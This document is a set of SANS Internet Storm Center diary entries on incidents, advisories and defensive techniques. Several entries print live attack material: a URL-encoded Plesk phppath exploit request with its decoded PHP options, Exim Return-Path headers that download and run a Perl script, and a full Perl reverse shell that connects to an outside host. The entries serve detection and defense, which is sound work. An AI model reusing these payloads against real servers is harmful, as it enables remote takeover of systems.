McAfee Artemis/GTI File Reputation False Positive

A couple of readers have reported false positive issues with McAfee's GTI and Artemis products. According to a knowledge base article on McAfee's site, the file reputation system appears to be producing bad results due to a server issue [1].

From our readers:

I've seen an explosion of detections under Artemis on files I wouldn't expect. One machine is trying to delete the autorun on a U3 USB drive's emulated CD. Community.McAfee.com slowed down and went offline. I've been on hold far longer than I'd expect for support. (Michael)

------------

McAfee VirusScan is eating files again. This time it’s their GTI servers. I managed to shut off heuristics via EPO before it got out of hand. Minor OS and app damage. (John)

------------

Artemis is a file reputation checking service from McAfee included in its Virus Scan Enterprise. Today it went on the fritz for my organization around 1600 EST. It was deleting random files such as our Cisco IP Communicator and all kinds of temp files etc. McAfee sent us a notification and will be sending more info out on its SNS mailing list. Advise all turn off Artemis features for home and business users and in the meantime they shut the cloud servers down. (Travis)

[1] https://kc.mcafee.com/corporate/index?page=content&id=KB78993

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute


POP3 Server Brute Forcing Attempts Using Polycom Credentials

Our reader Pete submitted an interesting set of log entries from his POP3 server:

LOGIN FAILED, user=PlcmSpIp, ip=[::ffff:117.102.119.146]

LOGIN FAILED, user=plcmspip, ip=[::ffff:117.102.119.146]

LOGIN FAILED, user=plcmspip, ip=[::ffff:117.102.119.146]

LOGIN FAILED, user=ts, ip=[::ffff:117.102.119.146]

LOGIN FAILED, user=bsoft, ip=[::ffff:117.102.119.146]

The interesting part is that the attacker used usernames that are usually associated with Polycom SIP PBXs. I don't have a Polycom server handy, but if anybody does: do they usually include a POP3 server? Or do they require POP3 accounts for these credentials?
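For anyone who wants to check their own mail logs for the same pattern, here is a minimal Python sketch that groups failed logins by source address. It assumes the log lines look exactly like Pete's entries above; the function name `usernames_by_source` is made up for this example, and folding usernames to lower case is a simplification.

```python
import re
from collections import defaultdict

# Matches lines such as:
#   LOGIN FAILED, user=PlcmSpIp, ip=[::ffff:117.102.119.146]
FAILED_LOGIN = re.compile(
    r"LOGIN FAILED, user=(?P<user>[^,\s]+), ip=\[(?P<ip>[^\]]+)\]"
)


def usernames_by_source(lines):
    """Map each source address to the sorted list of usernames it tried."""
    tried = defaultdict(set)
    for line in lines:
        match = FAILED_LOGIN.search(line)
        if not match:
            continue
        ip = match.group("ip")
        # Strip the IPv4-mapped IPv6 prefix so the plain IPv4 address is reported.
        if ip.lower().startswith("::ffff:"):
            ip = ip[len("::ffff:"):]
        # Assumption: fold case so PlcmSpIp and plcmspip count as one guess.
        tried[ip].add(match.group("user").lower())
    return {ip: sorted(users) for ip, users in tried.items()}
```

Feeding it the five lines above yields a single source address with three distinct usernames, which makes lists of vendor default accounts easy to spot.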

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute


More heavily URL encoded PHP Exploits against Plesk "phppath" vulnerability

Thanks to a reader for sending in this log entry from his Apache Server:

POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E

%63%6C%75%64%65%3D%6F

%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E

%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E

%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F

%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A

%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1

Russ quickly decoded it to:

/phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n
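If you want to decode entries like this yourself, a minimal Python sketch follows. It uses only the standard library's `urllib.parse`; the helper name `decode_request_target` is invented for this example, and the sample input is just the first part of the request above.

```python
from urllib.parse import unquote, unquote_plus


def decode_request_target(target):
    """Percent-decode a request target taken from a web server log.

    The path is decoded with unquote(); the query string is decoded with
    unquote_plus() so that '+' turns into a space, as it does in the
    decoded request shown above.
    """
    path, separator, query = target.partition("?")
    return unquote(path) + separator + unquote_plus(query)


# First part of the logged request, split only to keep the lines short.
sample = (
    "/%70%68%70%70%61%74%68/%70%68%70?%2D%64+"
    "%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E"
)
print(decode_request_target(sample))
```

Note that a signature matching the literal string "phppath" will miss these requests unless the URL is normalized first.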

This appears to be an exploit attempt against Plesk, a popular hosting management platform. A patch for this vulnerability was released in June [1]. We covered the vulnerability before [2], but continue to see exploit attempts like the one above. The exploit takes advantage of a configuration error that creates the script alias "phppath", which can be used to execute shell commands via PHP. The request above passes a set of PHP command-line options that accomplish the following:

- allow URL includes, so remote files can be included

- turn off safe mode to disable various protections

- turn off the suhosin patch (put it into "simulation mode" so it doesn't block anything)

- set "disable_functions" to an empty string to override any such setting in your PHP configuration file

- auto-prepend "php://input", which will execute any PHP script submitted in the body of this request

Please let us know if you are able to capture the body of the request!





Thanks to another reader for submitting a packet capture of a full request:

The Headers:

Host: <IP Address>

Content-Type: application/x-ww-forum-urlencoded

Content-Lenght: 64

<?php echo "Content-Type: text/html\r\n\r\n"; echo "___2pac\n"; ?>

This payload will just print the string ___2pac, likely to detect if the vulnerability exists. No user agent is sent, which should make it easy to block these requests using standard mod_security rules.

[1] http://kb.parallels.com/en/116241

[2] https://isc.sans.edu/diary/Plesk+0-day+Real+or+not+/15950

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute


BGP multiple banking addresses hijacked

On 24 July 2013 a significant number of Internet Protocol (IP) addresses that belong to banks suddenly were routed to somewhere else. An IP address is how packets are routed to their destination across the Internet.

Why is this important you ask? Well, imagine the Internet suddenly decided that you were living in the middle of Asia and all traffic that should go to you ends up traveling through a number of other countries to get to you, but you aren't there. You are still at home and haven't moved at all. All packets that should happily route to you now route elsewhere. Emails sent to you bounce as undeliverable, or are read by other people. Banking transactions fail. HTTPS handshakes get invalid certificate errors. This defeats the confidentiality, integrity, and availability of all applications running in the hijacked address spaces for the time that the hijack is running.

In fact this sounds like a nifty way to attack an organization doesn't it? The question then would be how to pull it off, hijack someone else's address?

The Autonomous System (AS) in question is owned by NedZone Internet BV in the Netherlands. This can be found by querying whois for the AS 25459. According to RIPE this AS originated 369 prefixes in the last 30 days, of these 310 had unusually small prefixes. Typically a BGP advertisement is at least a /24 or 256 unique Internet addressable IPs. A large number of these were /32 or single IP addresses.

The short answer is that any Internet Service Provider (ISP) that is part of the global Border Gateway Protocol (BGP) network can advertise a route to a prefix that it owns. It simply updates the routing tables to point to itself, and then the updates propagate throughout the Internet. If an ISP announces for a prefix it does not own, traffic may be routed to it, instead of to the owner. The more specific prefix, or the one with the shortest apparent route wins. That's all it takes to disrupt traffic to virtually anyone on the Internet, connectivity and willingness to announce a route that does not belong to you. This is not a new attack, it has happened numerous times in the past, both malicious attacks and accidental typos have been the cause.
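To illustrate why a more specific prefix wins, here is a small Python sketch of longest-prefix matching. It is a toy model of route selection, not of BGP itself: the prefixes come from the documentation range 203.0.113.0/24, the AS labels are made-up private-use numbers, and `best_route` is a name invented for this example.

```python
import ipaddress


def best_route(destination, routes):
    """Pick the most specific announced prefix that covers the destination.

    `routes` is a list of (prefix, origin) pairs. Returns a
    (prefix, origin) tuple, or None if no announcement covers the address.
    """
    address = ipaddress.ip_address(destination)
    candidates = []
    for prefix, origin in routes:
        network = ipaddress.ip_network(prefix)
        if address in network:
            candidates.append((network, origin))
    if not candidates:
        return None
    # Longest prefix length means most specific route.
    network, origin = max(candidates, key=lambda item: item[0].prefixlen)
    return str(network), origin


# Hypothetical announcements: the legitimate /24 and a hijacker's /32.
routes = [
    ("203.0.113.0/24", "AS64500 (legitimate owner)"),
    ("203.0.113.5/32", "AS64511 (hijacker)"),
]
print(best_route("203.0.113.5", routes))
print(best_route("203.0.113.9", routes))
```

Only the single hijacked address follows the /32; the rest of the /24 still reaches its owner, which is one reason such hijacks can go unnoticed.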

The announcements from AS 25459 can be seen at:

http://www.ris.ripe.net/mt/asdashboard.html?as=25459

A sampling of some of the owners of the IP addresses that were hijacked follows:

1 AMAZON-AES - Amazon.com, Inc.

2 AS-7743 - JPMorgan Chase & Co.

1 ASN-BBT-ASN - Branch Banking and Trust Company

2 BANK-OF-AMERICA Bank of America

1 CEGETEL-AS Societe Francaise du Radiotelephone S.A

1 FIRSTBANK - FIRSTBANK

1 HSBC-HK-AS HSBC HongKong

1 PFG-ASN-1 - The Principal Financial Group

2 PNCBANK - PNC Bank

1 REGIONS-ASN-1 - REGIONS FINANCIAL CORPORATION

Some on the list were owned by that ISP; what was odd about them was the prefix size. The bulk of the IP addresses were owned by various hosting providers. So, the question is:

What happened?

Makes you wonder about the fundamental (in)security of this set of experimental protocols we use called the Internet, doesn't it?

Cheers,

Adrien de Beaupré

Intru-shun.ca Inc.


Dovecot / Exim Exploit Detects

Sometimes it doesn't take an IDS to detect an attack; just reading your e-mail will do. Our reader Timo sent along these two e-mails he received, showing exploitation of a recent Dovecot/Exim configuration flaw [1]:

Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}x.cc.st/exim``perl${IFS}/tmp/p.pl`@blaat.com>

X-Original-To: postmaster@localhost

Delivered-To: postmaster@localhost

Received: from domain.local (disco.dnttm.ro [193.226.98.239])

by [REMOVED]

Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}x.cc.st/php.jpg``perl${IFS}/tmp/p.pl`@blaat.com>

X-Original-To: postmaster@localhost

Delivered-To: postmaster@localhost

Received: from domain.local (disco.dnttm.ro [193.226.98.239])

by [REMOVED]

The actual exploit happens in the "Return-Path" line. If Exim is used as a mail server, it can be configured to "pipe" messages to an external program in order to allow for more advanced delivery and filtering options. A common configuration includes the mail delivery agent Dovecot, which implements a POP3 and IMAP server. Sadly, the sample configuration provided to configure Dovecot with Exim passes the string the attacker provided as "MAIL FROM" in the e-mail envelope as a shell parameter without additional validation.
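To find similar attempts in your own mail, a rough Python sketch like the one below can flag envelope senders that contain shell metacharacters. The character set is an assumption chosen to catch the backticks and ${IFS} tricks seen above; it is a detection aid, not a fix for the configuration, and `is_suspicious_sender` is a name made up for this example.

```python
import re

# Backticks, pipes, semicolons, ampersands, and ${...} / $(...) expansions
# have no business in an envelope sender address.
SHELL_METACHARACTERS = re.compile(r"[`|;&]|\$[{(]")


def is_suspicious_sender(address):
    """Return True if the address contains shell metacharacters."""
    return bool(SHELL_METACHARACTERS.search(address))


# Sender taken from the first Return-Path header above.
sample = "x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}x.cc.st/exim``perl${IFS}/tmp/p.pl`@blaat.com"
print(is_suspicious_sender(sample))
print(is_suspicious_sender("postmaster@localhost"))
```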

The first script ("exim") is a little Perl reverse shell connecting to port 9 on vps.usits.net (reformatted for readability):

use Socket;

$i="vps.usits.net";

$p=9;

socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));

if(connect(S,sockaddr_in($p,inet_aton($i)))) {

open(STDIN,">&S");

open(STDOUT,">&S");

open(STDERR,">&S");

exec("/bin/sh -i");};

The second script first retrieves a Perl script, and then executes it. The Perl script implements a simple IRC client connecting to mix.cf.gs on port 3303 (right now, this resolves to 140.117.32.135, but is not responding on port 3303).

For more details, see the write-up by RedTeam Pentesting [2].

[1] http://osvdb.org/show/osvdb/93004

[2] https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute


Wireshark 1.8.9 and 1.10.1 Security Update

Wireshark fixes the following security issues in both versions.

The following dissectors could go into a large loop in both versions:

Bluetooth SDP (CVE-2013-4927)

DIS (CVE-2013-4929)

GSM RR (CVE-2013-4931)

The following parsers/dissectors could crash:

DVB-CI (CVE-2013-4930)

GSM A Common (CVE-2013-4932)

Netmon (CVE-2013-4933 and CVE-2013-4934)

ASN.1 PER (CVE-2013-4935)

The following parsers/dissectors could crash (applies to 1.10.1 only):

DCP ETSI (CVE-2013-4083)

P1 (CVE-2013-4920)

Radiotap (CVE-2013-4921)

DCOM ISystemActivator (CVE-2013-4922, CVE-2013-4923, CVE-2013-4924, CVE-2013-4925, CVE-2013-4926)

Bluetooth OBEX (CVE-2013-4928)

PROFINET (CVE-2013-4936)

Several other bugs have been fixed. A complete list is available for version 1.8.9 [2] and for version 1.10.1 [1].

[1] http://www.wireshark.org/docs/relnotes/wireshark-1.10.1.html

[2] http://www.wireshark.org/docs/relnotes/wireshark-1.8.9.html

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Defending Against Web Server Denial of Service Attacks

Earlier this weekend, one of our readers reported an odd attack against an Apache web server that he supports. The server was getting pounded with port 80 requests like the excerpt below. This attack had been ramping up since the 21st of July, but the "owners" of the server only detected problems with website accessibility today. They contacted the server support staff, who attempted to block the attack by scripting a search for the particular user agent string and then dropping the IP address into iptables rules. There was one big problem, though: the attack was originating from upwards of 4 million IP addresses across the past several days, and about 40k each hour. That is a significant number of iptables rules in the chain and is generally unmanageable.

The last-ditch effort was to use mod_security to drop any request carrying that user agent. Unfortunately, a small percentage of customers may be getting blocked by this effort to contain the problem. With this implemented, the server is usable again, at least until the attackers change their modus operandi.

It appears that the botnet of the day was targeting this domain for reasons that we do not really understand. Our reader wanted to share this information as a way to help others defend against this type of activity in the future. It is quite likely that others out there may be under attack, or will be under attack in the future.

I would encourage our readers to think about how you would counteract an attack of this scale on your web servers. This would be a good scenario to train and practice within your security organization and server support teams. If you have other novel ideas of how to defend against this type of attack, please comment on this diary.

Sample of DoS attack traffic (only 7 lines of literally 4 million log lines in the past few days)

A.B.120.152 - - [21/Jul/2013:02:53:42 +0000] "POST /?CtrlFunc_DDDDDEEEEEEEFFFFFFFGGGGGGGHHHH HTTP/1.1" 404 9219 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

C.D.3.168 - - [21/Jul/2013:02:53:43 +0000] "POST /?CtrlFunc_yyyzzzzzzzzzz00000000001111111 HTTP/1.1" 404 9213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

E.F.67.90 - - [21/Jul/2013:02:53:44 +0000] "POST /?CtrlFunc_FFFGGGGGGGGGGGGGGGGGGGGGGHHHHH HTTP/1.1" 404 9209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

G.H.76.206 - - [21/Jul/2013:02:53:45 +0000] "POST /?CtrlFunc_iOeOOkzUEV8cUMTiqhZZCwwQBvH9Ot HTTP/1.0" 404 9136 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

I.J.21.174 - - [21/Jul/2013:02:53:45 +0000] "POST / HTTP/1.1" 200 34778 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

K.L.57.51 - - [21/Jul/2013:02:53:45 +0000] "POST / HTTP/1.1" 200 34796 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

M.N.29.143 - - [21/Jul/2013:02:53:46 +0000] "POST /?CtrlFunc_ooppppppppppqqqqqqqqqqrrrrrrrr HTTP/1.1" 404 9213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
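To get a feel for the scale before choosing a defense, a short Python sketch such as the following can count distinct clients per hour for one user agent. It assumes Apache's combined log format as in the sample above; `clients_per_hour` is a name invented for this example, and the client field is matched loosely so the anonymized addresses in the sample still parse.

```python
import re
from collections import defaultdict

# Apache combined log format; the client field is matched loosely.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<day>[^:]+):(?P<hour>\d{2}):[^\]]+\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)

ATTACK_AGENT = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


def clients_per_hour(lines, agent=ATTACK_AGENT):
    """Count distinct client addresses per (day, hour) for one user agent."""
    seen = defaultdict(set)
    for line in lines:
        match = LOG_LINE.match(line.strip())
        if match and match.group("agent") == agent:
            seen[(match.group("day"), match.group("hour"))].add(match.group("client"))
    return {bucket: len(clients) for bucket, clients in seen.items()}
```

If the hourly count is in the tens of thousands, as reported here, per-address firewall rules are clearly the wrong tool, and matching on a request property makes more sense.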

mod_security rule:

SecRule REQUEST_HEADERS:User-Agent "^Mozilla/4.0 \(compatible; MSIE 6.0; Windows NT 5.1; SV1\)$" "log,drop,phase:1,msg:'Brute Force Attack Dropped'"


ISC BIND DoS

The Internet Systems Consortium has released a security advisory involving the ISC BIND nameserver. Per the advisory, a specially crafted DNS query could cause the DNS service to terminate, leading to a denial of service. This security issue can be exploited remotely and has been seen in the wild by multiple ISC customers. It is recommended that DNS server administrators using ISC BIND upgrade to the newest patched release. More information is available at https://kb.isc.org/article/AA-01015


A Couple of SSH Brute Force Compromises

One common and stupidly simple way hosts are compromised is weak SSH passwords. You would think people have learned by now, but evidently there are still enough systems with root passwords like 12345 around to make scanning for them a worthwhile exercise. As a result, one of my favorite honeypot tools is kippo, and we have talked about the tool before. I figured it is a good time to write a quick update on some recent compromises.

A typical compromise tends to follow a basic pattern:

- user logs in as root

- looks a bit around the system (uname -a, cpuinfo and the like)

- sometimes performs a bandwidth test by downloading a large file, for example a Windows service pack.

- then installs some kind of rootkit/backdoor/bot

- sometimes adds a user to the system.

Here are some of the recent artifacts:

- a UID 0 user called "cvsroot" (this user CAN be found on normal systems, but not with a UID of 0)

- the usual "hidden" directory name of many spaces (e.g. cd /var/tmp; mkdir " " )
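The first artifact is easy to check for. The Python sketch below lists accounts other than root that have UID 0, given the text of a passwd file. It assumes the standard colon-separated passwd layout; `extra_uid0_accounts` is a name made up for this example, and on a live system you would pass it the contents of /etc/passwd.

```python
def extra_uid0_accounts(passwd_text):
    """Return the names of accounts other than root that have UID 0."""
    names = []
    for line in passwd_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # passwd fields: name:password:UID:GID:comment:home:shell
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names


# Made-up sample showing the "cvsroot" artifact described above.
sample = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
cvsroot:x:0:0::/home/cvsroot:/bin/bash
"""
print(extra_uid0_accounts(sample))
```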

Here are some of the domains I have seen used to download bots and other tools from:

bnry.jorgee.nu, anglefire.com/komales88, donjoan.go.ro

One particularly interesting attacker actually used a little trick to figure out if the system ran kippo: installing a non-existent package. If the "apt-get" command is used, kippo will always simulate success, even if the package doesn't exist. So our enterprising hacker issued the following command:

apt-get install kippofuck

and of course, kippo pretended to install this package. The attacker, of course, immediately disconnected.

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute


A couple Site Updates

We are always trying to tweak the ISC website a bit to make it more useful. This week, we moved live a couple new features and are looking for feedback. Note that these features do require you to log in to take advantage of them.

- Our news page got reorganized again. I am not sure if we got it "right" yet, but I think it is now more usable. The goal is to allow users to "rank" news to make the feed overall more relevant. Once you are logged in, you will see a "+1" button to add your weight to an article.

- We made the diary comments a bit more interactive by integrating them with a forum to allow for threaded discussions / quotes and the like. There are now also some generic security categories for other discussions and a section to comment on current news.

For any feedback, please use the comment form.

Thanks.

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute


Sessions with(out) cookies

Recently in a penetration test engagement I tested a WebSphere application. The setup was more or less standard, but the interesting thing happened when I went to analyze how the application handles sessions.

The vast majority of web applications today use cookies to store session information. However, the application I tested set a very weird cookie with the following content:

SSLJSESSION=0000SESSIONMANAGEMENTAFFINI:-1

Clearly that cannot be used for session handling; however, no other cookies were set by the application, yet sessions were handled correctly. After a bit of browsing through WebSphere’s documentation, I found out that WebSphere (actually IBM HTTP Server, as well as SUN One Web Server) supports a feature called SSL ID Session Tracking. Basically, it binds web application sessions to SSL sessions. As a result, the web application needs to do almost no session handling itself, since the server performs it on the application's behalf.

However, in this simplicity lurk several potential problems:

- Since the web application’s sessions are tied to the SSL session, any user that can somehow access the same SSL session is automatically authenticated by the target web application. While this scenario is not all that likely, it is still possible through, for example, an incorrectly configured proxy that somehow reuses opened SSL sessions – opening Burp proxy and letting it listen on the network interface in such a setup is a really bad idea.

- The web application (as it should always anyways) has to properly handle logout activities and invalidate the SSL session – since there are no cookies it must prevent the web browser from reusing the same SSL session.

On the other hand, there are several really nice features here – probably the most important being that an attacker cannot abuse vulnerabilities such as Cross Site Scripting to steal session information. Of course, XSS can still be used to perform other attacks through the vulnerable application, but session information cannot be stolen any more.

SSL ID Session Tracking is, however, deprecated in WebSphere 7.0, so it is pretty rare today. This means that applications must use cookies to handle session information, or transfer it as parameters in requests, which is not recommended since such information is visible in logs. In essence, this leaves us with cookies, which are probably here to stay, so it does not hurt to remind your developers to use the HttpOnly and Secure attributes; they are trivial to set and, while they are not a silver bullet, they can make exploitation of some vulnerabilities much more difficult.
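As a reminder of how little work these attributes take, here is a minimal sketch using Python's standard `http.cookies` module. It is only an illustration, not WebSphere configuration: the cookie name JSESSIONID and the helper `session_cookie_header` are assumptions for this example, and in a Java application server the same flags are normally set through the server or deployment configuration.

```python
from http.cookies import SimpleCookie


def session_cookie_header(session_id):
    """Build a Set-Cookie value with the HttpOnly and Secure attributes set."""
    cookie = SimpleCookie()
    cookie["JSESSIONID"] = session_id
    cookie["JSESSIONID"]["path"] = "/"
    # HttpOnly keeps the cookie away from page scripts (limits theft via XSS).
    cookie["JSESSIONID"]["httponly"] = True
    # Secure makes the browser send the cookie over HTTPS only.
    cookie["JSESSIONID"]["secure"] = True
    return cookie["JSESSIONID"].OutputString()


print(session_cookie_header("abc123"))
```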

--

Bojan

@bojanz

INFIGO IS


Apple Developer Site Breach

Apple closed access to its developer site after learning that it had been compromised and developers' personal information had been breached [1].

In the notice posted to the site, Apple explained that some developers' personal information, like name, e-mail address and mailing address, may have been accessed. The note does not mention passwords, or whether password hashes were accessed.

One threat often forgotten in these breaches is phishing. If an attacker has access to some personal information associated with a site, it is fairly easy to craft a reasonably convincing phishing e-mail that uses the fact that the site was breached to trick users into resetting their password. These e-mails may be more convincing if they include the user's user name, real name or mailing address as stored with the site.

A video on YouTube claims to show records obtained in the compromise [2]. The video states that 100,000 accounts were accessed to make Apple aware of the vulnerability in its site and that the data will be deleted.

[1] http://devimages.apple.com/maintenance/

[2] http://www.youtube.com/watch?v=q000_EOWy80

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute


Why use Regular Expressions?

As an IT professional, you may already know some regular expressions (regex) and have used tools such as grep to search your log files for a particular piece of text (e.g. an actor's IP address). Parsing huge amounts of data takes time, but regex is powerful: a few tools (e.g. Perl, grep, sed or awk) can turn a complex task into an automated one that is easy to solve. Working in security also means being challenged to sift through large amounts of data to find an answer that might not always be obvious.

However, you might ask yourself how to tackle this problem without resorting to complex solutions, such as moving the data into a database and writing a frontend to provide the answer you are looking for. The answer is to script, or to combine the results of, well-known Unix tools (most of them are available as Windows binaries [2]) into usable output. Regex can automate tasks that would otherwise take minutes or hours to complete.

It is quite likely that some of the security tools or devices deployed in your network use some form of regex to parse the data they inspect. Snort rules are one example; logs collected by a SIEM are another.

Here are a few examples. I need to retrieve every IP address in subnet 192.168.25.0/24 from a log file. To ease this task, I can use grep:

grep "192\.168\.25\.[[:digit:]]\{1,3\}" query.log

grep -E "192\.168\.25\.[0-9]{1,3}" query.log

Another simple yet powerful search is to ignore subnet 192.168.25.0/24 completely and show everything else. The -v (invert-match) option in grep selects non-matching lines:

grep -v -E "192\.168\.25\.[0-9]{1,3}" query.log
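A text pattern only approximates subnet membership. When exact matching matters, a short script can do the comparison numerically. The Python sketch below is one way to do it, under the assumption that addresses appear in the log as plain dotted quads; `lines_with_subnet` is a name invented for this example.

```python
import ipaddress
import re

# Candidate dotted quads; values that are not valid addresses are skipped later.
IPV4_CANDIDATE = re.compile(r"(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)")


def lines_with_subnet(lines, subnet="192.168.25.0/24", invert=False):
    """Return lines containing an address inside `subnet`.

    With invert=True, return the lines that do not, like grep -v.
    """
    network = ipaddress.ip_network(subnet)
    selected = []
    for line in lines:
        hit = False
        for candidate in IPV4_CANDIDATE.findall(line):
            try:
                if ipaddress.ip_address(candidate) in network:
                    hit = True
                    break
            except ValueError:
                # Something like 192.168.25.999 looks like an address but is not one.
                continue
        if hit != invert:
            selected.append(line)
    return selected
```

The same function works for subnets that do not fall on an octet boundary, such as a /26, where a regex becomes awkward to write.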

When you need to replace a string of text in one or more documents, sed is a Unix application well suited to the task. This example searches for http: and deletes it every time it finds it in the file. The s stands for substitute (the pattern is a regex) and the g for global, which replaces every occurrence on a line rather than only the first.

sed 's/http://g' file.txt > newfile.txt

sed can also be used to delete all empty lines in a file:

sed '/^$/d' file.txt > newfile.txt (The result is sent to newfile.txt and the original is preserved)

sed '/^$/d' -i file.txt (Warning: This example removes the empty lines and overwrites the original)

This last example pipes the output of one regex tool into another tool. Reusing the above example:

wc -l file.txt (Counts the number of lines in the file before processing)

sed '/^$/d' file.txt | wc -l (Counts the number of lines in the file after processing)



The Regex Coach [1] is a tool that can help ease learning for those who are new to regex. In the Regular Expression window, you can build your regex pattern step by step and watch the results; the Target string window shows and highlights whether your regex is parsing the data correctly. Here is an example of DNS data where the fields are separated by two pipes (IP address 192.168.25.99 is highlighted in both windows):

String: 1374432453.842653||192.168.25.99||64.71.255.198||IN||s0-2mdn-net.l.google.com.||A||74.125.226.156||228||1

Regex: (\d*).(\d*)\|\|(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\|\|(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\|\|(\w*)\|\|(.*\.)\|\|(\w{1,3})\|\|(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\|\|(\d*)\|\|(.*)

The following regex characters have the following meaning:

\d Match a digit character

\w Match a "word" character
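The same pattern can be tried outside The Regex Coach. The Python sketch below applies the regex above, unchanged, to the sample string with the standard `re` module. The field labels in the comments are guesses based on the sample data, not documented field names.

```python
import re

DNS_RECORD = re.compile(
    r"(\d*).(\d*)\|\|"                        # timestamp: seconds and fraction
    r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\|\|"  # first address (client?)
    r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\|\|"  # second address (server?)
    r"(\w*)\|\|"                              # class, e.g. IN
    r"(.*\.)\|\|"                             # queried name, ending in a dot
    r"(\w{1,3})\|\|"                          # record type, e.g. A
    r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\|\|"  # answer address
    r"(\d*)\|\|"                              # numeric field (TTL?)
    r"(.*)"                                   # last field
)

record = (
    "1374432453.842653||192.168.25.99||64.71.255.198||IN||"
    "s0-2mdn-net.l.google.com.||A||74.125.226.156||228||1"
)

match = DNS_RECORD.match(record)
if match:
    fields = match.groups()
    print(fields[2])  # the highlighted address, 192.168.25.99
```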

Regex is a powerful way to search text-based files for just about any data with an identifiable pattern.

[1] http://www.weitz.de/regex-coach/

[2] http://gnuwin32.sourceforge.net/

[3] http://en.wikipedia.org/wiki/Regular_expression

[4] http://www.regexpal.com/

[5] http://regexlib.com/Contributors.aspx

[6] http://regexlib.com/CheatSheet.aspx

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Ubuntu Forums Security Breach

The Ubuntu Forums are currently down because they have been breached. According to their post, "the attackers have gotten every user's local username, password, and email address from the Ubuntu Forums database." [1] They have advised users who use the same password with other services to change it immediately. Ubuntu One, Launchpad and other Ubuntu/Canonical services are not affected. The current announcement can be read on the Ubuntu Forums site [1].

[1] http://ubuntuforums.org/announce.html

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu




Do you have rogue Internet gateways in your network? Check it with nmap

Many people feel calm when the network perimeter of their company is secured by solutions like firewalls, Network Access Control (NAC) and VPNs. However, mobility has changed the perspective, and users can now find alternate ways to access the Internet without restriction while still connected to the corporate network. Examples of this are 3G/4G modems and cellphones sharing Internet access with laptop or desktop devices. You can even find small boxes like the Raspberry Pi that an attacker can plug into the network to get insider access from the outside.

How can you tell if a device other than your company's official Internet gateway is allowing access to the Internet? You need to find out which devices have IP forwarding enabled. There is an easy way to perform this task using nmap. The only prerequisite is that the analyzed box accepts ICMP requests. The following is an example of the scan, assembled from the arguments described below:

nmap -sn 192.168.0.0/24 --script ip-forwarding --script-args="target=www.google.com"

The arguments used are:

- -sn: Tells nmap to perform a ping scan and disables the port scan.

- 192.168.0.0/24: The network range to scan. You can use your own range or a single IP address.

- --script ip-forwarding: This script comes with all nmap installations. It sends a special ICMP echo request, addressed to an external host, to each scanned device as if that device were the default gateway.

- --script-args="target=www.google.com": This is the external target for the echo-request packet.

This packet is sent to every device that previously answered the ping scan. Any device with IP forwarding enabled will forward it, and nmap flags that device in its output once the echo reply comes back.

I will write more about nmap scripts in my next diaries. Feliz día de la independencia para los Colombianos! (Happy independence day to Colombian people!)

Manuel Humberto Santander Peláez

SANS Internet Storm Center - Handler

Twitter:@manuelsantander

Web:http://manuel.santander.name

e-mail: msantand at isc dot sans dot org


Where is my data? When hosting providers go away

- Denied access to physical servers – In many hosting situations the line between who owns what is difficult to draw, and often physical access will be denied until ownership can be demonstrated. In the meantime you may have expensive equipment sitting in a datacentre that you can no longer access.

